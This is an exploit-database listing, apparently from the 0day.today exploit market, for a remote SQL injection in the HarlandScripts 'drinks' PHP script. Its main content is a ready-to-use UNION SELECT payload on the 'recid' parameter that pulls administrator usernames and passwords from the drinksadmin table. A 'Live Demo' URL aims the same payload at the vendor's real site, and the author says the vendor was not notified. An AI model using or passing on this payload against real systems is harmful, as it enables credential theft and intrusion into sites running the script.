[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HarlandScripts drinks (recid) Remote SQL Injection Velnerability

Author
Ex Tacy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4082
Category
web applications
Date add
05-11-2008
Platform
unsorted
================================================================
HarlandScripts drinks (recid) Remote SQL Injection Velnerability
================================================================


===========================================
Drinks script.
--------------------------------------------------------------------------------------
Vendor:     http://www.fivedollarscripts.com
Demo:       http://www.fivedollarscripts.com/drinks/index.php
Notified:     No. Probably don't care.
Price:        Five bones.
============================================

Exploit:
/path/index.php?cmd=6&recid=null union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--

Live Demo:
http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--

contact: x.s7acy at gmail dot com
greetings to bobthejanitor, mason, that new president guy, and the rest.
first script blah blah blah
=============================================



#  0day.today [2024-12-25]  #